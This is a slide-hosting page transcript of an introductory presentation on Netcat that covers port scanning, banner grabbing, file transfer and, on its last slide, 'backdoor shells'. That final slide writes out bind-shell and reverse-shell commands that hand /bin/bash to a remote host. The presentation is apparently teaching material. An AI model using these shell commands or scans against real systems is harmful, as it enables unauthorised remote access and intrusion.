1 / 8

Netcat Hackers Swiss Army knife

Netcat was released in 1996, it is a networking program designed to read and write data across both Transmission Control Protocol and User Datagram Protocol. Netcat is also referred to as u201cSwiss Army Knifeu201d. Netcatu2019s functionality is helpful as both a standalone program and a back-end tool in a wide range of applications. Netcat can be used for portu00a0scanning, transferring files, banner grabbing, port listening, redirection and more.<br>

kavya001
Download Presentation

Netcat Hackers Swiss Army knife

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. NetcatHackers Swiss Army knife Netcat was released in 1996, it is a networking program designed to read and write data across both Transmission Control Protocol and User Datagram Protocol. Netcat is also referred to as “Swiss Army Knife”. Netcat’s functionality is helpful as both a standalone program and a back-end tool in a wide range of applications. Netcat can be used for port scanning, transferring files, banner grabbing, port listening, redirection and more. The goal of this blog is to provide you with a basic understanding of Netcat. Usage: – Netcat — h Shows all the options available.

  2. ncat — h • nc — h • netcat — h ncat — h nc — h netcat — h

  3. Port Scanning

  4. nc -v -w 2 -z 192.168.1.10 20–80 In this, -v is for verbose mode, -w is for the timeout for connects, -z used for scanning mode and NC will try connecting to every port between 20–80. Even though Netcat can be used for port scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning. The randomize ports (-r) switch can be used to choose port numbers randomly in the range Banner Grabbing

  5. Banner grabbing is an enumeration technique, which is designed to determine the brand, version, operating system, or other relevant information about a particular service or application. This is especially important if you are looking for a vulnerability associated with a particular version of some service. We can use NC to grab port banners in the following way: nc -v 192.168.1.10 80 File Transfer

  6. Push a file from client to the listener nc –l -p [LocalPort] > [outfile] Listen on [LocalPort], store results in [outfile] nc –w3 [TargetIPaddr] [port] <[infile] Push [infile]to [TargetIPaddr] on [port] Pull a file from listener back to the client: nc –l -p [LocalPort] <[infile] Listen on [LocalPort], prep to push [infile] nc –w3 [TargetIPaddr] [port] >[outfile] Connect to [TargetIPaddr] on [port] and retrieve [outfile]

  7. Backdoor Shells

  8. Listening backdoor shell on Linux: nc –l –p [LocalPort] –e /bin/bash Create a shell on local port [LocalPort]that can then be accessed using a fundamental Netcat client Reverse backdoor shell on Linux: nc [YourIPaddr] [port] –e /bin/bash Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nclistener. For More Articles visit here www.icssindia.in

More Related